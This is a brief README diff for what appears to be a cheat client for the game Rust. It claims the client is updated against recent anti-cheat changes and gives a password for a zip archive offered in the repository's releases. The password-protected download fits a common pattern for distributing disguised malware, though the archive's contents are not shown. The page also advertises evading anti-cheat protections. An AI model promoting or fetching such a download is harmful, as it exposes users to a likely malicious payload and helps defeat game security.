marktaylor2090p6/RustNewClient-v2.5.1/README.md

 👀 Watch the repository to stay informed about future changes.

 📌 Current status: Updated for the latest Rust game version and recent anti-cheat/security changes.

+- Zip archive with the client can be downloaded in the releases of this repository
+- Password to the zip archive: 245ki34